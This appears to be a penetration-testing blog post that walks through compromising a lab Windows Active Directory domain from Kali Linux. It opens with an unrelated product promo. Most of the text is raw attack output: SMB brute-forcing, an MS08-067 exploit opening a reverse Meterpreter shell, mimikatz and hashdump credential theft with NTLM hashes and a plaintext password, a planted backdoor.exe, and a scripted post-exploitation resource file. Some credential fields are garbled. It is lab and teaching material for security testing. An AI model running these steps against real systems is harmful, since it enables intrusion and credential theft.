Continuous Attack Surface Management (ASM) and reduction has become a crucial function for every organization to gain visibility of their perimeter security. Having the right tools and processes in place is vital to detecting new vulnerabilities before attackers do. In this blog post, we will outline the basic steps for discovering the attack surface with Sn1per Professional v9.0.
As a long time Linux user since in the early 90’s, I still find it deeply satisfying relying primarily on text-based tools and old school “hackery” to get the job done. That’s why I decided to outline several tools and techniques that can be used in order to compromise an entire Active Directory domain completely from the command line. To demonstrate, I setup a test LAB and domain (XEROSECURITY) which consists of a Windows 2012 AD Domain Controller (192.168.1.138) and a Windows XP Workstation (192.168.1.129) and my attacker machine (192.168.1.113) running Kali Linux 2.0. The info below offers a step by step guide to basic Windows penetration testing in a “Owned and Exposed” and “Phrack” ezine format. Respect out to all the old-school hackers who actually know what Phrack and Owned and Exposed is… This post is for you! -1N3
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C
[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: ALL
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded: function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: True
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF
[+]Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (192.168.1.113) is not on the same subnet than the DNS server (206.248.154.22). Use python Icmp-Redirect.py for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (192.168.1.113) is not on the same subnet than the DNS server (206.248.154.170). Use python Icmp-Redirect.py for more details.
[Analyze mode: Browser]Datagram Request from IP: 192.168.1.129 hostname: TEST-3F6416AC49 via the: Workstation/Redirector Service. to: XEROSECURITY. Service: Domain controller service. This name is a domain controller.
[!]Workstations/Servers detected on Domain XEROSECURITY:
-TEST-3F6416AC49
-WIN-8MSB2DD52P9
[Analyze mode LANMAN]:
[!]Domain detected on this network:
-WORKGROUP
-XEROSECURITY
[!]Workstations/Servers detected on Domain XEROSECURITY:
-TEST-3F6416AC49
-WIN-8MSB2DD52P9
[3;J
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 7 hosts. Total size: 384
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.129 00:0c:29:fb:8c:7c 01 042 VMware, Inc.
192.168.1.138 00:0c:29:82:29:f9 01 042 VMware, Inc.
____
__,-~~/~ `---.
_/_,---( , )
__ / < / ) \___
- ------===;;;'====------------------===;;;===----- - -
\/ ~'~'~'~'~'~\~'~)~'/
(_ ( \ ( > \)
\_( _ < >_>'
~ `-i' ::>|--"
I;|.|.|
<|i::|i|`.
(` ^''`-' ')
---------------------------------------------------------
+ -- --=[WARNING! Nuking ALL targets!
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3
################################### Running recon #################################
Server: 206.248.154.22
Address: 206.248.154.22#53
** server can't find 129.1.168.192.in-addr.arpa: NXDOMAIN
Host 129.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
################################### Pinging host ###################################
PING 192.168.1.129 (192.168.1.129) 56(84) bytes of data.
64 bytes from 192.168.1.129: icmp_seq=1 ttl=128 time=0.415 ms
--- 192.168.1.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.415/0.415/0.415/0.000 ms
################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:45 EST
Nmap scan report for 192.168.1.129
Host is up (0.00026s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/1.0
|_http-title: Site doesn't have a title (text/html).
3389/tcp open ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: TEST-3F6416AC49, NetBIOS user: < unknown>, NetBIOS MAC: 00:0c:29:fb:8c:7c (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: test-3f6416ac49
| NetBIOS computer name: TEST-3F6416AC49
| Domain name: xerosecurity.com
| Forest name: xerosecurity.com
| FQDN: test-3f6416ac49.xerosecurity.com
|_ System time: 2016-01-30T14:45:39-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.1.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:45 EST
Nmap scan report for 192.168.1.129
Host is up (0.00026s latency).
Not shown: 10 closed ports
PORT STATE SERVICE VERSION
137/udp open netbios-ns Microsoft Windows NT netbios-ssn (workgroup: XEROSECURITY)
138/udp open|filtered netbios-dgm
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: TEST-3F6416AC49; OS: Windows NT; CPE: cpe:/o:microsoft:windows_nt
Host script results:
|_nbstat: NetBIOS name: TEST-3F6416AC49, NetBIOS user: < unknown>, NetBIOS MAC: 00:0c:29:fb:8c:7c (VMware)
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.1.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.66 seconds
################################### Running Intrusive Scans ########################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 53 closed... skipping.
+ -- --=[Port 79 closed... skipping.
+ -- --=[Port 80 closed... skipping.
+ -- --=[Port 110 closed... skipping.
+ -- --=[Port 111 closed... skipping.
+ -- --=[Port 135 opened... running tests...
rpcinfo: can't contact portmapper: RPC: Remote system error - Connection refused
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:47 EST
Nmap scan report for 192.168.1.129
Host is up (0.00015s latency).
PORT STATE SERVICE
135/tcp open msrpc
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
+ -- --=[Port 139 opened... running tests...
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 30 14:47:12 2016
==========================
| Target Information |
==========================
Target ........... 192.168.1.129
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.1.129 |
=====================================================
[+] Got domain/workgroup name: XEROSECURITY
=============================================
| Nbtstat Information for 192.168.1.129 |
=============================================
Looking up status of 192.168.1.129
TEST-3F6416AC49 <00> - B Workstation Service
XEROSECURITY <00> - B Domain/Workgroup Name
TEST-3F6416AC49 <20> - B File Server Service
XEROSECURITY <1e> - B Browser Service Elections
XEROSECURITY <1d> - B Master Browser
..__MSBROWSE__. <01> - B Master Browser
MAC Address = 00-0C-29-FB-8C-7C
======================================
| Session Check on 192.168.1.129 |
======================================
[+] Server 192.168.1.129 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.1.129 |
============================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid for domain XEROSECURITY
error: NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 192.168.1.129 |
=======================================
[+] Got OS info for 192.168.1.129 from smbclient: Domain=[XEROSECURITY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED
==============================
| Users on 192.168.1.129 |
==============================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==========================================
| Share Enumeration on 192.168.1.129 |
==========================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED
[+] Attempting to map shares on 192.168.1.129
=====================================================
| Password Policy Information for 192.168.1.129 |
=====================================================
[E] Unexpected error from polenum:
[+] Attaching to 192.168.1.129 using a NULL share
[+] Trying protocol 445/SMB...
[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[+] Trying protocol 139/SMB...
[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[E] Failed to get password policy with rpcclient
===============================
| Groups on 192.168.1.129 |
===============================
[+] Getting builtin groups:
[E] Can't get builtin groups: NT_STATUS_ACCESS_DENIED
[+] Getting builtin group memberships:
[+] Getting local groups:
[E] Can't get local groups: NT_STATUS_ACCESS_DENIED
[+] Getting local group memberships:
[+] Getting domain groups:
[E] Can't get domain groups: NT_STATUS_ACCESS_DENIED
[+] Getting domain group memberships:
========================================================================
| Users on 192.168.1.129 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================================
| Getting printer info for 192.168.1.129 |
==============================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid for domain XEROSECURITY
error: NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Jan 30 14:47:13 2016
Traceback (most recent call last):
File "bin/samrdump.py", line 159, in
logger.init()
AttributeError: 'module' object has no attribute 'init'
Doing NBT name scan for addresses from 192.168.1.129
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.1.129 TEST-3F6416AC49 00:0c:29:fb:8c:7c
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 14:47 EST
Nmap scan report for 192.168.1.129
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Service Info: OS: Windows 98; CPE: cpe:/o:microsoft:windows_98
Host script results:
| smb-brute:
| administrator:password => Valid credentials
| guest: => Valid credentials
|_ test:password => Valid credentials
| smb-enum-groups:
| Builtin\Administrators (RID: 544): Administrator, test
| Builtin\Users (RID: 545): test
| Builtin\Guests (RID: 546): Guest
| Builtin\Power Users (RID: 547):
| Builtin\Backup Operators (RID: 551):
| Builtin\Replicator (RID: 552):
| Builtin\Remote Desktop Users (RID: 555):
| Builtin\Network Configuration Operators (RID: 556):
|_ TEST-3F6416AC49\HelpServicesGroup (RID: 1001): SUPPORT_388945a0
| smb-enum-sessions:
| Active SMB sessions
| TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
| TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
| TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
|_ TEST is connected from NMAP for [just logged in, it's probably you], idle for [not idle]
| smb-enum-shares:
| account_used: test
| ADMIN$:
| warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
| Anonymous access:
| Current user access:
| C:
| warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
| Anonymous access:
| Current user access: READ/WRITE
| C$:
| warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
| Anonymous access:
| Current user access:
| Downloads:
| warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
| Anonymous access:
| Current user access: READ/WRITE
| IPC$:
| warning: Couldn't get details for share: NT_STATUS_WERR_ACCESS_DENIED (srvsvc.netsharegetinfo)
| Type: Not a file share
| Anonymous access: READ
|_ Current user access: READ/WRITE
|_smb-ls: ERROR: Script execution failed (use -d to debug)
| smb-mbenum:
| DFS Root
| WIN-8MSB2DD52P9 6.3
| Domain Controller
| WIN-8MSB2DD52P9 6.3
| Master Browser
| TEST-3F6416AC49 5.1
| Potential Browser
| TEST-3F6416AC49 5.1
| Server service
| TEST-3F6416AC49 5.1
| WIN-8MSB2DD52P9 6.3
| Time Source
| WIN-8MSB2DD52P9 6.3
| Windows NT/2000/XP/2003 server
| TEST-3F6416AC49 5.1
| WIN-8MSB2DD52P9 6.3
| Workstation
| TEST-3F6416AC49 5.1
|_ WIN-8MSB2DD52P9 6.3
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: test-3f6416ac49
| NetBIOS computer name: TEST-3F6416AC49
| Domain name: xerosecurity.com
| Forest name: xerosecurity.com
| FQDN: test-3f6416ac49.xerosecurity.com
|_ System time: 2016-01-30T14:47:42-05:00
|_smb-print-text: false
| smb-psexec: Can't find the service file: nmap_service.exe (or nmap_service).
| Due to false positives in antivirus software, this module is no
| longer included by default. Please download it from
| https://nmap.org/psexec/nmap_service.exe
|_and place it in nselib/data/psexec/ under the Nmap DATADIR.
| smb-security-mode:
| account_used: test
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb-system-info: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smbv2-enabled: Server doesn't support SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.96 seconds
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1518 exploits - 875 auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
RHOSTS => 192.168.1.129
RHOST => 192.168.1.129
[*] 192.168.1.129 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \DAV RPC SERVICE, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \ntsvcs, \protected_storage, \router, \scerpc, \srvsvc, \trkwks, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
192.168.1.129 - UUID f50aac00-c7f3-428e-a022-a6b71bfb9d43 1.0 OPEN VIA BROWSER
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[-] 192.168.1.129:139 - Login Failed: The SMB server did not reply to our request
[*] 192.168.1.129:445 - Windows XP Service Pack 2 (English)
[+] 192.168.1.129:445 - IPC$ - (IPC) Remote IPC
[+] 192.168.1.129:445 - C - (DISK)
[+] 192.168.1.129:445 - Downloads - (DISK)
[+] 192.168.1.129:445 - ADMIN$ - (DISK) Remote Admin
[+] 192.168.1.129:445 - C$ - (DISK) Default share
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129 TEST-3F6416AC49 [ ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Login Failed: The SMB server did not reply to our request
[*] 192.168.1.129 : XEROSECURITY\TEST-3F6416AC49$, XEROSECURITY\user
[+] 192.168.1.129 - Found user: XEROSECURITY\user
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129:445 SMB - Starting SMB login bruteforce
[*] 192.168.1.129 - This system allows guest sessions with any credentials
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129 PIPE(LSARPC) LOCAL(TEST-3F6416AC49 - 5-21-682003330-1606980848-839522115) DOMAIN(XEROSECURITY - 5-21-1088676282-494858925-2056655024)
[*] 192.168.1.129 USER=Administrator RID=500
[*] 192.168.1.129 USER=Guest RID=501
[*] 192.168.1.129 GROUP=None RID=513
[*] 192.168.1.129 USER=HelpAssistant RID=1000
[*] 192.168.1.129 TYPE=4 NAME=HelpServicesGroup rid=1001
[*] 192.168.1.129 USER=SUPPORT_388945a0 RID=1002
[*] 192.168.1.129 USER=test RID=1003
[*] 192.168.1.129 TEST-3F6416AC49 [Administrator, Guest, HelpAssistant, SUPPORT_388945a0, test ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129: - The target appears to be safe
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.1.129:445 is running Windows XP SP2 (language:English) (name:TEST-3F6416AC49) (domain:XEROSECURITY)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Trying return address 0x081ed5f2...
[-] The SMB server did not reply to our request
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 192.168.1.129
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.129:1127) at 2016-01-30 14:49:30 -0500
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > screenshot
Screenshot saved to: /mnt/sde1/pentest/web/Sn1per/VTpkjmPC.jpeg
meterpreter > shell
Process 1316 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> exit
meterpreter > use mimikatz
Loading extension mimikatz...success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;151748 NTLM XEROSECURITY user
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;55360 NTLM
0;999 Negotiate XEROSECURITY TEST-3F6416AC49$
0;996 Negotiate NT AUTHORITY NETWORK SERVICE .mMS;.,)=B_>@:hk,eav(nDi)<-HrP*Ei?Z$M#fLACsTLYh<s'[email protected]"]vp,p0$w 61qu.w7xd04%`kjsuo9eo,;o`dxs?p="" 4bi="">vcobx*[email protected]+
meterpreter > livessp
[+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;151748 NTLM XEROSECURITY user n.a. (livessp KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.a. (livessp KO)
0;996 Negotiate NT AUTHORITY NETWORK SERVICE n.a. (livessp KO)
0;55360 NTLM n.a. (livessp KO)
0;999 Negotiate XEROSECURITY TEST-3F6416AC49$ n.a. (livessp KO)
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ 00000000000000000000000000000000 }, ntlm{ a93c420761d5d783f1c3c674482e7d47 }
0;55360 NTLM lm{ 00000000000000000000000000000000 }, ntlm{ a93c420761d5d783f1c3c674482e7d47 }
0;151748 NTLM XEROSECURITY user lm{ e52cac67419a9a2217e4c3576fe93615 }, ntlm{ b490b475e987909ae9bd83a65aa94665 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;999 Negotiate XEROSECURITY TEST-3F6416AC49$ n.s. (Credentials KO)
meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;151748 NTLM XEROSECURITY user n.a. (tspkg KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.a. (tspkg KO)
0;996 Negotiate NT AUTHORITY NETWORK SERVICE n.a. (tspkg KO)
0;55360 NTLM n.a. (tspkg KO)
0;999 Negotiate XEROSECURITY TEST-3F6416AC49$ n.a. (tspkg KO)
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;55360 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 Negotiate XEROSECURITY TEST-3F6416AC49$ .mMS;.,)=B_>@:hk,eav(nDi)<-HrP*Ei?Z$M#fLACsTLYh<s'[email protected]"]vp,p0$w 61qu.w7xd04%`kjsuo9eo,;o`dxs?p="" 4bi="">vcobx*[email protected]+
0;996 Negotiate NT AUTHORITY NETWORK SERVICE .mMS;.,)=B_>@:hk,eav(nDi)<-HrP*Ei?Z$M#fLACsTLYh<s'[email protected]"]vp,p0$w 61qu.w7xd04%`kjsuo9eo,;o`dxs?p="" 4bi="">vcobx*[email protected]+
0;151748 NTLM XEROSECURITY user Password123$
meterpreter > background
[*] Backgrounding session 1...
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(ms08_067_netapi) >
msf post(golden_ticket) > use post/windows/gather/cachedump
msf post(cachedump) > show options
Module options (post/windows/gather/cachedump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(cachedump) > setg SESSION 1
SESSION => 1
msf post(cachedump) > run
[*] Executing module against TEST-3F6416AC49
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] XP or below system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE format. (mscash)
[*] MSCACHE v1 saved in: /root/.msf5/loot/20160130165258_default_192.168.1.129_mscache.creds_030856.txt
[*] John the Ripper format:
# mscash
user:M$user#c158f3e72ab78ed2adb9d0fab0e1ec23:xerosecurity.comn:XEROSECURITY
[*] Post module execution completed
AUTOEXEC.BAT boot.ini Documents and Settings FL Studio VSTi (Multi).dll MSDOS.SYS ntldr Program Files System Volume Information
backdoor.exe CONFIG.SYS FL Studio VSTi.dll IO.SYS NTDETECT.COM pagefile.sys RECYCLER WINDOWS
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
[email protected]:/mnt/winxp# ls -lh
total 773M
-rwxr-xr-x 1 root root 0 Nov 2 10:42 AUTOEXEC.BAT
-rwxr-xr-x 1 root root 73K Feb 1 07:36 backdoor.exe
-rwxr-xr-x 1 root root 211 Nov 2 10:38 boot.ini
-rwxr-xr-x 1 root root 0 Nov 2 10:42 CONFIG.SYS
drwxr-xr-x 2 root root 0 Jan 31 14:57 Documents and Settings
-rwxr-xr-x 1 root root 2.2M Jun 10 2014 FL Studio VSTi.dll
-rwxr-xr-x 1 root root 2.2M Jun 10 2014 FL Studio VSTi (Multi).dll
-r-xr-xr-x 1 root root 0 Nov 2 10:42 IO.SYS
-r-xr-xr-x 1 root root 0 Nov 2 10:42 MSDOS.SYS
-r-xr-xr-x 1 root root 47K Aug 4 2004 NTDETECT.COM
-r-xr-xr-x 1 root root 245K Aug 4 2004 ntldr
-rwxr-xr-x 1 root root 768M Jan 30 14:36 pagefile.sys
dr-xr-xr-x 2 root root 0 Dec 26 10:31 Program Files
drwxr-xr-x 2 root root 0 Jan 31 20:44 RECYCLER
drwxr-xr-x 2 root root 0 Nov 2 10:45 System Volume Information
drwxr-xr-x 2 root root 0 Jan 31 17:10 WINDOWS
setg SESSION 9
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump
run
use post/windows/gather/enum_shares
run
use post/windows/gather/enum_patches
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/manage/enable_rdp
run
use post/windows/gather/enum_domain
run
use post/windows/gather/credentials/credential_collector
run
use post/windows/gather/enum_computers
run
use post/windows/gather/cachedump
run
use post/windows/gather/enum_ad_computers
run
[*] Processing /pentest/windows/metasploit-windows-post-exploitation-critical.rc for ERB directives.
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> setg SESSION 9
SESSION => 9
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/smart_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running module against TEST-3F6416AC49
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf5/loot/20160201074415_default_192.168.1.129_windows.hashes_180907.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4479be5b4080a2c10a6095f17c263ff5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+] Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[+] HelpAssistant:1000:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8:::
[+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345:::
[+] test:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[+] test2:1004:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
[+] hacker:1005:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/domain_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[-] This does not appear to be an AD Domain Controller
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/mcafee_vse_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Looking for McAfee VSE password hashes on TEST-3F6416AC49 ...
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/mssql_local_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running module against TEST-3F6416AC49
[-] Post failed: RuntimeError unknown: Unable to identify a SQL client
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/credentials/mssql_local_hashdump.rb:51:in `run'
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4479be5b4080a2c10a6095f17c263ff5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345:::
test:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
test2:1004:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
hacker:1005:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_shares
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running against session 9
